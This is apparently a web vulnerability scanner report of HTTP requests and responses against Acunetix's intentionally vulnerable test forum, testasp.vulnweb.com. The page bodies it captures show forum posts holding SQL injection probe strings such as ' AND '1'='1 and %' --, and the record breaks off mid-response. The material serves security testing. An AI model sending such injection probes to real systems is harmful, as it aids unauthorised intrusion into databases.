<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4123 |
| Response Body - size: 4,123 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4129 |
| Response Body - size: 4,129 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Templatize.asp?item=html/about.html |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 333 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 4594 |
| Response Body - size: 4,594 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm"> offices</A> in Malta, US and the UK.<BR> </P> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 13536 |
| Response Body - size: 13,536 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro 